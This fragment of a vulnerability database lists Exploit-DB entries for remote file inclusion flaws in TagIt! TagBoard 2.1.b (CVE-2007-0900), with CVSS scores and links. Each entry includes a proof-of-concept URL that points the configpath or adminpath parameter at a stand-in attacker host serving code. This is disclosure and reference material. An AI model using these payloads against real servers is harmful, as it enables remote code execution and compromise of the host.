"https://www.exploit-db.com/download/29588/"}, {"lastseen": "2016-02-03T10:38:41", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/ban_watch.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/ban_watch.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29582", "href": "https://www.exploit-db.com/exploits/29582/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/ban_watch.phpp?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29582/"}, {"lastseen": "2016-02-03T10:39:05", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/editTagmin.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/editTagmin.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29585", "href": "https://www.exploit-db.com/exploits/29585/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/editTagmin.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29585/"}, {"lastseen": "2016-02-03T10:39:43", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/index.php adminpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/index.php adminpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29589", "href": "https://www.exploit-db.com/exploits/29589/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/index.php?adminpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29589/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-0928", "CVE-2007-0953", "CVE-2007-0983", "CVE-2007-1016", "CVE-2007-1021", "CVE-2006-7000", "CVE-2006-7005", "CVE-2007-0952", "CVE-2007-0954", "CVE-2006-7012", "CVE-2006-7004", "CVE-2007-1010", "CVE-2006-5249", "CVE-2006-7024", "CVE-2006-6998", "CVE-2007-0930", "CVE-2007-0984", "CVE-2006-6999", "CVE-2007-0900", "CVE-2007-0985", "CVE-2007-1012", "CVE-2007-1015"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2007-02-15T00:00:00", "published": "2007-02-15T00:00:00", "id": "SECURITYVULNS:VULN:7245", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7245", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
